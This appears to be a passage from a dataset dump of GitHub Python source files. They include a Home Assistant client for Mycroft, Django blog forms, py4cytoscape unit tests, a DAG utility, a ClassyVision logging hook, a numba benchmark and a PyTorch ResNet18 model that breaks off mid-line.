non-Ok status code)\n\n Returns:\n Dict represeting entity\n \"\"\"\n json_data = self._get_state()\n # require a score above 50%\n best_score = 50\n best_entity = None\n if json_data:\n for state in json_data:\n try:\n if state[\"entity_id\"].split(\".\")[0] in types:\n # something like temperature outside\n # should score on \"outside temperature sensor\"\n # and repetitions should not count on my behalf\n score = fuzz.token_sort_ratio(\n entity, state[\"attributes\"][\"friendly_name\"].lower()\n )\n if score > best_score:\n best_score = score\n best_entity = {\n \"id\": state[\"entity_id\"],\n \"dev_name\": state[\"attributes\"][\"friendly_name\"],\n \"state\": state[\"state\"],\n \"best_score\": best_score,\n \"attributes\": state[\"attributes\"],\n }\n score = fuzz.token_sort_ratio(\n entity, state[\"entity_id\"].lower()\n )\n if score > best_score:\n best_score = score\n best_entity = {\n \"id\": state[\"entity_id\"],\n \"dev_name\": state[\"attributes\"][\"friendly_name\"],\n \"state\": state[\"state\"],\n \"best_score\": best_score,\n \"attributes\": state[\"attributes\"],\n }\n except KeyError:\n pass\n return best_entity\n\n def find_entity_attr(self, entity: str) -> dict:\n \"\"\"Get the entity attributes to be used in the response dialog.\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n Dict with entity's attributes\n \"\"\"\n json_data = self._get_state()\n\n if json_data:\n for attr in json_data:\n if attr[\"entity_id\"] == entity:\n entity_attrs = attr[\"attributes\"]\n try:\n if attr[\"entity_id\"].startswith(\"light.\"):\n # Not all lamps do have a color\n unit_measur = entity_attrs[\"brightness\"]\n else:\n unit_measur = entity_attrs[\"unit_of_measurement\"]\n except KeyError:\n unit_measur = \"\"\n # IDEA: return the color if available\n # TODO: change to return the whole attr dictionary =>\n # free use within handle methods\n sensor_name = entity_attrs[\"friendly_name\"]\n sensor_state = attr[\"state\"]\n entity_attr = {\n \"unit_measure\": unit_measur,\n \"name\": sensor_name,\n \"state\": sensor_state,\n }\n return entity_attr\n return None\n\n def list_entities(self, types: list) -> list:\n \"\"\"List all entities matching domains used within our skill\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n List with entity and it's friendly name\n \"\"\"\n\n json_data = self._get_state()\n entities = []\n if json_data:\n for state in json_data:\n try:\n entity_id = state[\"entity_id\"].split(\".\")\n domain = entity_id[0]\n entity = entity_id[1]\n if domain in types:\n \"\"\"Domain of Entity is in handled types.\n Add Entity and its friendly name to list.\n \"\"\"\n entities.append(entity)\n entities.append(state[\"attributes\"][\"friendly_name\"].lower())\n except KeyError:\n pass\n return entities\n\n def execute_service(self, domain: str, service: str, data: dict) -> Response:\n \"\"\"Execute service at HAServer\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n HA response\n \"\"\"\n if self.ssl:\n req = post(\n f\"{self.url}/api/services/{domain}/{service}\",\n headers=self.headers,\n data=json.dumps(data),\n verify=self.verify,\n timeout=TIMEOUT,\n )\n else:\n req = post(\n f\"{self.url}/api/services/{domain}/{service}\",\n headers=self.headers,\n data=json.dumps(data),\n timeout=TIMEOUT,\n )\n req.raise_for_status()\n return req\n\n def find_component(self, component: str) -> bool:\n \"\"\"Check if a component is loaded at the HA-Server\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n\n Returns:\n True/False if component found in response\n \"\"\"\n if self.ssl:\n req = get(\n f\"{self.url}/api/components\",\n headers=self.headers,\n verify=self.verify,\n timeout=TIMEOUT,\n )\n else:\n req = get(\n f\"{self.url}/api/components\", headers=self.headers, timeout=TIMEOUT\n )\n\n req.raise_for_status()\n return component in req.json()\n\n def engage_conversation(self, utterance: str) -> dict:\n \"\"\"Engage the conversation component at the Home Assistant server\n\n Throws request Exceptions\n (Subclasses of ConnectionError or RequestException,\n raises HTTPErrors if non-Ok status code)\n Attributes:\n utterance raw text message to be processed\n\n Returns:\n Dict answer by Home Assistant server\n { 'speech': textual answer,\n 'extra_data': ...}\n \"\"\"\n data = {\"text\": utterance}\n if self.ssl:\n req = post(\n f\"{self.url}/api/conversation/process\",\n headers=self.headers,\n data=json.dumps(data),\n verify=self.verify,\n timeout=TIMEOUT,\n )\n else:\n req = post(\n f\"{self.url}/api/conversation/process\",\n headers=self.headers,\n data=json.dumps(data),\n timeout=TIMEOUT,\n )\n req.raise_for_status()\n return req.json()[\"speech\"][\"plain\"]\n","repo_name":"MycroftAI/mycroft-dinkum","sub_path":"skills/homeassistant.mark2/ha_client.py","file_name":"ha_client.py","file_ext":"py","file_size_in_byte":12076,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
+{"seq_id":"19791716081","text":"from django import forms\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, ButtonHolder, Submit, Button, Div, Fieldset, Field, Hidden, HTML\nfrom sorl.thumbnail.fields import ImageFormField\nfrom taggit.forms import TagField\nfrom ckeditor.widgets import CKEditorWidget\n\nfrom .models import Article\n\n\nclass BlogEntryForm(forms.Form):\n\n title = forms.CharField(max_length=150)\n image = ImageFormField()\n tags = TagField()\n content = forms.CharField(widget=CKEditorWidget())\n score = forms.DecimalField(max_value=settings.RATING_SCALE, max_digits=settings.RATING_MAX_DIGITS, min_value=0)\n\n def __init__(self, *args, **kwargs):\n super(BlogEntryForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'pure-form pure-form-stacked pure-u-1'\n self.helper.layout = Layout(\n Div(\n Button('reset', 'Reset Section', data_section_id=1, data_btn_nm='reset', wrapper_class='rep', css_class='sec_btn pure-button'),\n Button('del', 'Delete Section', data_section_id=1, data_btn_nm='del', wrapper_class='rep', css_class='sec_btn pure-button'),\n Field('title', wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('score', wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('image', wrapper_class='norep pure-control-group', css_class='rep'), # Class norep tells the item must be removed from replica's\n Field('content', wrapper_class='rep pure-control-group', css_class='rep'),\n css_class='section',\n css_id='sec',\n data_section_id=1\n ),\n Field('tags', wrapper_class='norep pure-control-group', css_class='norep'),\n ButtonHolder(\n Button('add', 'Add Section', data_btn_nm='add', data_section_count=1, css_id='add', css_class='sec_btn pure-button'),\n Button('save', 'Save Section', css_id='save', css_class='pure-button'),\n Submit('submit', 'Submit Post', css_id='submit', css_class='pure-button pure-button-primary'),\n css_id='buttons'\n ),\n )\n\n class Media:\n js = (\n )\n\n\nclass BlogEntryUpdateForm(forms.Form):\n def __new__(cls, *args, **kwargs):\n \"\"\"\n Add sections dynamically\n :param cls:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n new_class = super(BlogEntryUpdateForm, cls).__new__(cls, *args, **kwargs)\n article = kwargs.get('initial')\n base_fields = {}\n for section in article.articlesection_set.all():\n delim = '' if section.section_order == 1 else '_' + str(section.section_order)\n base_fields['content' + delim] = forms.CharField(widget=CKEditorWidget(), initial=section.content)\n base_fields['score' + delim] = forms.DecimalField(max_value=settings.RATING_SCALE, max_digits=settings.RATING_MAX_DIGITS, min_value=0, initial=section.score)\n base_fields['id' + delim] = forms.IntegerField(initial=section.id)\n\n if section.section_order == 1:\n base_fields['title' + delim] = forms.CharField(max_length=150, initial=section.title)\n base_fields['title'].widget.attrs['readonly'] = 'readonly'\n base_fields['image'] = ImageFormField(initial=article.image)\n base_fields['article'] = forms.IntegerField(initial=article.id)\n base_fields['tags' + delim] = TagField(initial=', '.join(article.tags.names()))\n else:\n base_fields['title' + delim] = forms.CharField(max_length=150, initial=section.title)\n new_class.base_fields = base_fields\n\n return new_class\n\n def __init__(self, *args, **kwargs):\n super(BlogEntryUpdateForm, self).__init__(*args, **kwargs)\n # Field mappings for dynamic generation\n self.helper = FormHelper()\n self.helper.form_class = 'pure-form pure-form-stacked pure-u-1'\n # TODO: This can be moved to above super call to avoid self.initial initialize\n article = kwargs.pop('initial')\n # Explicitly initializing form to handle edits\n #if not self.is_bound:\n self.initial = {}\n\n layouts = []\n article_id = article.id\n\n for section in article.articlesection_set.all():\n if section.section_order == 1:\n layouts.append(\n Div(\n Field('title', wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('score', wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Div(\n HTML(\"\"\"{% load thumbnail %}{% load misc %}
Currently: {{ form.image|filename }}{% if form.image.value %}{% thumbnail form.image.value \"300x200\" as im %}{% endif %}>
\"\"\"),\n css_class='pure-u-1'\n ),\n #Field('image', wrapper_class='norep pure-control-group', css_class='rep'), # Class norep tells the item must be removed from replica's\n Field('content', wrapper_class='rep pure-control-group', css_class='rep'),\n Hidden('id', section.id),\n css_class='section',\n css_id='sec',\n data_section_id=1,\n data_article_id=article_id\n )\n )\n else:\n delim = '_' + str(section.section_order)\n secnum = section.section_order\n layouts.append(\n Div(\n Field('title' + delim, wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('score' + delim, wrapper_class='rep pure-control-group', css_class='rep'), # Class rep tells it is replicable item\n Field('content' + delim, wrapper_class='rep pure-control-group', css_class='rep'),\n Hidden('id' + delim, section.id),\n css_class='section',\n css_id='sec' + delim,\n data_section_id=secnum\n )\n )\n\n layouts.append(Field('tags', wrapper_class='norep pure-control-group', css_class='norep'))\n layouts.append(ButtonHolder(\n Hidden('article', article_id),\n Submit('submit', 'Update Post', css_id='submit', css_class='pure-button pure-button-primary'),\n css_id='buttons'\n ))\n\n self.helper.layout = Layout(\n *layouts\n )\n\n class Media:\n js = (\n )\n\n\ndef validate_vote_type(value):\n if value not in (0, 1, 9):\n raise ValidationError('Invalid Vote Type', code='invalid')\n\n\nclass BlogVoteForm(forms.Form):\n article = forms.IntegerField()\n section = forms.IntegerField()\n vote_type = forms.IntegerField(validators=[validate_vote_type,]) # 0 is Negative and 1 is positive vote, 9 is Abusive\n","repo_name":"kumarvaradarajulu/django-andblog","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"16519527292","text":"import unittest\nimport re\nimport json\nfrom requests import RequestException\n\nfrom test_utils import *\n\n\nclass StyleValuesTests(unittest.TestCase):\n def setUp(self):\n try:\n close_session(False)\n# delete_all_networks()\n except:\n pass\n\n def tearDown(self):\n pass\n\n _TEST_STYLE = 'galFiltered Style'\n\n @print_entry_exit\n def test_get_node_property(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_property, 'node_names', 'node', 'NODE_LABEL', 'COMMON', 'YER112W', 'LSM4')\n\n @print_entry_exit\n def test_get_edge_property(self):\n # Initialization\n load_test_session()\n update_style_mapping(style_name=self._TEST_STYLE, mapping=map_visual_property(visual_prop='EDGE_LABEL', table_column='interaction', mapping_type='p'))\n\n self._check_get_property(get_edge_property, 'edge_names', 'edge', 'EDGE_LABEL', 'interaction', 'YDR277C (pp) YJR022W', 'pp')\n\n @print_entry_exit\n def test_get_network_property(self):\n # Initialization\n load_test_session()\n\n scale_prop = get_network_property('NETWORK_SCALE_FACTOR')\n self.assertIsInstance(scale_prop, float)\n\n self.assertRaises(CyError, get_network_property, None)\n self.assertRaises(CyError, get_network_property, 'BogusProperty')\n self.assertRaises(CyError, get_network_property, 'NETWORK_SCALE_FACTOR', network='BogusNetwork')\n\n @print_entry_exit\n def test_get_node_color(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_color, 'node_names', 'node', None, None, 'YER112W', '#FFFFE7')\n\n @print_entry_exit\n def test_get_node_size(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_size, 'node_names', 'node', None, None, 'YER112W', 46.470588235294116)\n\n @print_entry_exit\n def test_get_node_width(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_width, 'node_names', 'node', None, None, 'YER112W', 46.470588235294116)\n\n @print_entry_exit\n def test_get_node_height(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_node_height, 'node_names', 'node', None, None, 'YER112W', 46.470588235294116)\n\n @print_entry_exit\n def test_get_node_position(self):\n # Initialization\n load_test_session()\n all_node_names = get_table_columns(columns=['name'])\n\n def check_position_table(position_df, node_id_set):\n # Verify that all nodes are present\n self.assertSetEqual(set(position_df.index), node_id_set)\n # Verify that the table has exactly the 'x' and 'y' columns\n self.assertSetEqual(set(position_df), {'x', 'y'})\n\n # Verify that getting positions for all nodes works\n check_position_table(get_node_position(), set(all_node_names['name']))\n\n # Verify that getting positions for all nodes works when nodes are named\n check_position_table(get_node_position(list(all_node_names['name'])), set(all_node_names['name']))\n\n # Verify that getting positions for all nodes works when identified by SUIDs\n check_position_table(get_node_position(list(all_node_names.index)), set(all_node_names.index))\n\n # Verify that getting positions for all nodes works when identified by SUIDs\n check_position_table(get_node_position('YER112W'), {'YER112W'})\n\n # Verify that bad property, node/edge name or network is caught\n self.assertRaises(CyError, get_node_position, ['bogusName'])\n self.assertRaises(CyError, get_node_position, network='BogusNetwork')\n\n @print_entry_exit\n def test_get_edge_line_width(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_edge_line_width, 'edge_names', 'edge', None, None, 'YOR355W (pp) YNL091W', 2.0)\n\n @print_entry_exit\n def test_get_edge_color(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_edge_color, 'edge_names', 'edge', None, None, 'YOR355W (pp) YNL091W', '#808080')\n\n @print_entry_exit\n def test_get_edge_line_style(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_edge_line_style, 'edge_names', 'edge', None, None, 'YOR355W (pp) YNL091W', 'SOLID')\n\n @print_entry_exit\n def test_get_edge_target_arrow(self):\n # Initialization\n load_test_session()\n\n self._check_get_property(get_edge_target_arrow_shape, 'edge_names', 'edge', None, None, 'YOR355W (pp) YNL091W', 'NONE')\n\n @print_entry_exit\n def test_get_network_center(self):\n # Initialization\n load_test_session()\n\n # Verify that the proper dict is returned\n res = get_network_center()\n self.assertIsInstance(res, dict)\n self.assertEqual(len(res), 2)\n self.assertIn('x', res)\n self.assertIsInstance(res['x'], float)\n self.assertIn('y', res)\n self.assertIsInstance(res['y'], float)\n\n # Verify that a bad network is caught\n self.assertRaises(CyError, get_network_center, network='BogusNetwork')\n\n @print_entry_exit\n def test_get_network_zoom(self):\n # Initialization\n load_test_session()\n\n # Verify that the proper type is returned\n res = get_network_zoom()\n self.assertIsInstance(res, float)\n\n # Verify that a bad network is caught\n self.assertRaises(CyError, get_network_zoom, network='BogusNetwork')\n\n def _check_get_property(self, getter_func, names_param, table, visual_property, data_column, single_name, single_value):\n # Create various flavors of parameter lists for getter_func, including lists and string lists of names and suids\n if data_column is None:\n all_names = get_table_columns(columns=['name'], table=table)\n else:\n all_names = get_table_columns(columns=['name', data_column], table=table)\n prop_param = {} if visual_property is None else {'visual_property': visual_property}\n all_names_param = {names_param: list(all_names['name'])}\n all_names_str_param = {names_param: ','.join(list(all_names['name']))}\n all_suids_param = {names_param: list(all_names.index)}\n all_suids_str_param = {names_param: str(list(all_names.index))[1:-1]}\n prop_names_params = all_names_param.copy()\n prop_names_params.update(prop_param)\n prop_names_str_params = all_names_str_param.copy()\n prop_names_str_params.update(prop_param)\n prop_suids_params = all_suids_param.copy()\n prop_suids_params.update(prop_param)\n prop_suids_str_params = all_suids_str_param.copy()\n prop_suids_str_params.update(prop_param)\n single_name_params = {names_param: single_name}\n single_name_params.update(prop_param)\n\n # Verify that visual properties can be returned for all nodes/edges\n name_value_dict = getter_func(**prop_param)\n self.assertIsInstance(name_value_dict, dict)\n self.assertEqual(len(name_value_dict), len(all_names.index))\n if data_column is not None:\n name_found = [name in name_value_dict and value == name_value_dict[name] for name, value in zip(all_names['name'], all_names[data_column])]\n self.assertFalse(False in name_found)\n\n # Verify that the same visual properties are returned when the nodes/edges are identified by name list\n by_name_dict = getter_func(**prop_names_params)\n self.assertDictEqual(by_name_dict, name_value_dict)\n\n # Verify that the same visual properties are returned when the nodes/edges are identified by string name list\n by_name_dict = getter_func(**prop_names_str_params)\n self.assertDictEqual(by_name_dict, name_value_dict)\n\n # Verify that the same visual properties are returned when nodes/edges are identified by SUID\n # This means looking the SUID up in the all_names table, getting the name, and then using prior test's result\n by_suid_dict = getter_func(**prop_suids_params)\n suid_found = [by_suid_dict[suid] == name_value_dict[all_names['name'][suid]] for suid in by_suid_dict]\n self.assertFalse(False in suid_found)\n\n # Verify that the same visual properties are returned when nodes/edges are identified by string SUID list\n # This means looking the SUID up in the all_names table, getting the name, and then using prior test's result\n by_suid_dict = getter_func(**prop_suids_str_params)\n suid_found = [by_suid_dict[suid] == name_value_dict[all_names['name'][suid]] for suid in by_suid_dict]\n self.assertFalse(False in suid_found)\n\n # Verify that the right node and visual property are returned when nodes/edges name is a string\n by_str_dict = getter_func(**single_name_params)\n self.assertDictEqual(by_str_dict, {single_name: single_value})\n\n # Verify that bad property, node/edge name or network is caught\n if visual_property is not None:\n self.assertRaises(CyError, getter_func, **{names_param: single_name})\n self.assertRaises(CyError, getter_func, visual_property=visual_property, **{names_param: 'bogusName'})\n self.assertRaises(CyError, getter_func, visual_property='BogusProperty', **{names_param: single_name})\n self.assertRaises(CyError, getter_func, **{names_param: single_name}, network='BogusNetwork')\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cytoscape/py4cytoscape","sub_path":"tests/test_style_values.py","file_name":"test_style_values.py","file_ext":"py","file_size_in_byte":9624,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"3"}
+{"seq_id":"34210952675","text":"from congregation.dag.nodes import OpNode\n\n\nclass Dag:\n def __init__(self, roots: set):\n self.roots = roots\n\n def __str__(self):\n return \"\\n\".join(str(node) for node in self.top_sort())\n\n def involves_compute_party(self, pid: int):\n \"\"\"\n For a given PID, check if it owns any\n data associated with this DAG\n \"\"\"\n\n for r in self.roots:\n for sw_set in r.out_rel.stored_with:\n if pid in sw_set:\n return True\n return False\n\n def dfs_visit(self, visitor):\n\n visited = set()\n for root in self.roots:\n self._dfs_visit(root, visitor, visited)\n\n return visited\n\n def _dfs_visit(self, node: OpNode, visitor, visited: set):\n\n visitor(node)\n visited.add(node)\n for child in node.children:\n if child not in visited:\n self._dfs_visit(child, visitor, visited)\n\n def dfs_print(self):\n self.dfs_visit(print)\n\n def get_all_nodes(self):\n return self.dfs_visit(lambda node: node)\n\n def top_sort(self):\n\n unmarked = sorted(list(self.get_all_nodes()), key=lambda x: x.out_rel.name)\n marked = set()\n temp_marked = set()\n ordered = []\n\n while unmarked:\n node = unmarked.pop()\n self._top_sort_visit(node, marked, temp_marked, unmarked, ordered)\n\n return ordered\n\n def _top_sort_visit(self, node: OpNode, marked: set, temp_marked: set, unmarked: [list, set], ordered: list):\n\n if node in temp_marked:\n raise Exception(f\"Cycle detected in graph, not a dag: Node {node} was in {temp_marked}.\")\n\n if node not in marked:\n if node in unmarked:\n unmarked.remove(node)\n temp_marked.add(node)\n children = sorted(list(node.children), key=lambda x: x.out_rel.name)\n\n for other_node in children:\n self._top_sort_visit(other_node, marked, temp_marked, unmarked, ordered)\n\n marked.add(node)\n unmarked.append(node)\n temp_marked.remove(node)\n ordered.insert(0, node)\n","repo_name":"multiparty/congregation","sub_path":"congregation/dag/dag.py","file_name":"dag.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"}
+{"seq_id":"20079589124","text":"import logging\nfrom typing import Optional\n\nfrom classy_vision.generic.distributed_util import get_rank\nfrom classy_vision.hooks import register_hook\nfrom classy_vision.hooks.classy_hook import ClassyHook\n\n\n@register_hook(\"loss_lr_meter_logging\")\nclass LossLrMeterLoggingHook(ClassyHook):\n \"\"\"\n Logs the loss, optimizer LR, and meters. Logs at the end of a phase.\n \"\"\"\n\n on_phase_start = ClassyHook._noop\n on_end = ClassyHook._noop\n\n def __init__(self, log_freq: Optional[int] = None) -> None:\n \"\"\"The constructor method of LossLrMeterLoggingHook.\n\n Args:\n log_freq: if specified, also logs every ``log_freq`` batches.\n\n \"\"\"\n super().__init__()\n assert log_freq is None or isinstance(\n log_freq, int\n ), \"log_freq must be an int or None\"\n self.log_freq: Optional[int] = log_freq\n\n def on_start(self, task) -> None:\n logging.info(f\"Starting training. Task: {task}\")\n\n def on_phase_end(self, task) -> None:\n \"\"\"\n Log the loss, optimizer LR, and meters for the phase.\n \"\"\"\n batches = len(task.losses)\n if batches:\n # Most trainers will sync meters on phase end, however we\n # do not explicitly state this since it is possible for a\n # trainer to implement an unsynced end of phase meter or\n # for meters to not provide a sync function.\n self._log_loss_lr_meters(task, prefix=\"Synced meters: \", log_batches=True)\n\n def on_step(self, task) -> None:\n \"\"\"\n Log the LR every log_freq batches, if log_freq is not None.\n \"\"\"\n if self.log_freq is None or not task.train:\n return\n batches = len(task.losses)\n if batches and batches % self.log_freq == 0:\n self._log_loss_lr_meters(task, prefix=\"Approximate meters: \")\n\n def _log_loss_lr_meters(self, task, prefix=\"\", log_batches=False) -> None:\n \"\"\"\n Compute and log the loss, lr, and meters.\n \"\"\"\n\n phase_type = task.phase_type\n phase_type_idx = task.train_phase_idx if task.train else task.eval_phase_idx\n batches = len(task.losses)\n\n # Loss for the phase\n loss = sum(task.losses) / batches\n phase_pct = batches / task.num_batches_per_phase\n msg = (\n f\"{prefix}[{get_rank()}] {phase_type} phase {phase_type_idx} \"\n f\"({phase_pct*100:.2f}% done), loss: {loss:.4f}, meters: {task.meters}\"\n )\n if task.train:\n msg += f\", lr: {task.optimizer.options_view.lr:.4f}\"\n if phase_type == \"test\" and hasattr(task, \"ema\"):\n msg += f\", ema: {task.ema}\"\n if log_batches:\n msg += f\", processed batches: {batches}\"\n\n logging.info(msg)\n","repo_name":"facebookresearch/ClassyVision","sub_path":"classy_vision/hooks/loss_lr_meter_logging_hook.py","file_name":"loss_lr_meter_logging_hook.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":1563,"dataset":"github-code","pt":"3"}
+{"seq_id":"35145125115","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'polling'\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('/', views.questionview, name='questions'),\n path('/results/', views.results, name='results'), \n]","repo_name":"CaptainDespair/web-statistics","sub_path":"webstatistics/appstat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73625571281","text":"import src.robot as r\nimport sys\nimport os\nimport json\n\ndef main():\n \n # leer fichero de configuracion saimazoom_config.json\n with open('saimazoom_config.json') as json_file:\n data = json.load(json_file)\n p_almacen = data['p_almacen'] or 0.95\n robot = r.Robot(p_almacen)\n robot.channel.start_consuming()\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)","repo_name":"Willygap1572/Saimazoom","sub_path":"launch_robot.py","file_name":"launch_robot.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39409939879","text":"import numpy as np\nimport numba as nb\nimport time\n\n@nb.njit(parallel=True)\ndef laplace_kernel(V):\n ans=np.empty(V.shape)\n n=V.shape[0]\n m=V.shape[1]\n for i in nb.prange(1,n-1):\n for j in range(1,m-1):\n ans[i,j]=V[i,j]-np.log(0.25*(np.exp(V[i,j-1])+np.exp(V[i,j+1])+np.exp(V[i-1,j])+np.exp(V[i+1,j])))\n return ans\n\n\nn=1000\nx=np.random.rand(n,n)\n\ny1=laplace_kernel(x)\nt1=time.time()\ny1=laplace_kernel(x)\nt2=time.time()\nprint('numba kernel took ',t2-t1)\n\nt1=time.time()\ny2=x-0.25*(np.roll(x,1,axis=0)+np.roll(x,-1,axis=0)+np.roll(x,1,axis=1)+np.roll(x,-1,axis=1))\nt2=time.time()\nprint('roll took ',t2-t1)\nprint(np.std( (y2-y1)[1:-1,1:-1]))\n\n","repo_name":"sievers/phys512-2021","sub_path":"performance/laplace_2d_numba.py","file_name":"laplace_2d_numba.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"}
+{"seq_id":"71828077842","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch import nn, optim\n\n\"\"\"\nResnet18要经过一个卷积层、Pooling层,然后是四个“小方块”,一个方块由两个A Build Block组成,\n一个A Build Block又由两个卷积层组成,四个“小方块”即16层,最后是average pool、全连接层。\n由于Pooling层不需要参数学习,故去除Pooling层,整��resnet18网络由18层组成\nhttps://blog.csdn.net/weixin_39867066/article/details/112275617\n\nmodel des: ResNet18(\n (conv1): Sequential(\n (0): Conv2d(3, 64, kernel_size=(3, 3), stride=(3, 3))\n (1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n (blk1): ResBlk(\n (conv1): Conv2d(64, 128, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1))\n (bn1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (conv2): Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n (bn2): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (extra): Sequential(\n (0): Conv2d(64, 128, kernel_size=(1, 1), stride=(2, 2))\n (1): BatchNorm2d(128, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (blk2): ResBlk(\n (conv1): Conv2d(128, 256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1))\n (bn1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (conv2): Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n (bn2): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (extra): Sequential(\n (0): Conv2d(128, 256, kernel_size=(1, 1), stride=(2, 2))\n (1): BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (blk3): ResBlk(\n (conv1): Conv2d(256, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1))\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (extra): Sequential(\n (0): Conv2d(256, 512, kernel_size=(1, 1), stride=(2, 2))\n (1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n )\n )\n (blk4): ResBlk(\n (conv1): Conv2d(512, 512, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1))\n (bn1): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (conv2): Conv2d(512, 512, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n (bn2): BatchNorm2d(512, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)\n (extra): Sequential()\n )\n (outLayer): Linear(in_features=512, out_features=10, bias=True)\n)\n\"\"\"\n\n\nclass ResBlk(nn.Module):\n\n def __init__(self, channel_in, channel_out, stride=1):\n super(ResBlk, self).__init__()\n\n self.conv1 = nn.Conv2d(channel_in, channel_out, kernel_size=3, stride=stride, padding=1)\n self.bn1 = nn.BatchNorm2d(channel_out)\n self.conv2 = nn.Conv2d(channel_out, channel_out, kernel_size=3, stride=1, padding=1)\n self.bn2 = nn.BatchNorm2d(channel_out)\n\n # 短接层\n self.extra = nn.Sequential()\n # 保证X与res层相加时维度是对应的,这步只是进行转化成相同维度\n if channel_out != channel_in: # [b, ch_in, h, w] => [b, ch_out, h, w]\n self.extra = nn.Sequential(\n nn.Conv2d(channel_in, channel_out, kernel_size=1, stride=stride),\n nn.BatchNorm2d(channel_out)\n )\n\n def forward(self, x):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.bn2(self.conv2(out))\n out = self.extra(x) + out\n out = F.relu(out)\n\n return out\n\n\nclass ResNet18(nn.Module):\n\n def __init__(self):\n super(ResNet18, self).__init__()\n\n self.conv1 = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=3, stride=3, padding=0),\n nn.BatchNorm2d(64)\n )\n\n self.blk1 = ResBlk(64, 128, stride=2) # 减少了feature像素,可以增加通道\n self.blk2 = ResBlk(128, 256, stride=2)\n self.blk3 = ResBlk(256, 512, stride=2)\n self.blk4 = ResBlk(512, 512, stride=2)\n\n self.outLayer = nn.Linear(512 * 1 * 1, 10)\n\n def forward(self, x):\n\n x = F.relu(self.conv1(x))\n\n x = self.blk1(x)\n x = self.blk2(x)\n x = self.blk3(x)\n x = self.blk4(x)\n\n x = F.adaptive_avg_pool2d(x, [1, 1])\n\n x = x.view(x.size(0), -1)\n x = self.outLayer(x)\n\n return x\n\nclass RunResNet18:\n def run(self):\n batchSize = 128\n epochs = 10\n # download data\n cifar_train = datasets.CIFAR10('cifar', True, transform=transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ]), download=True)\n cifar_train = 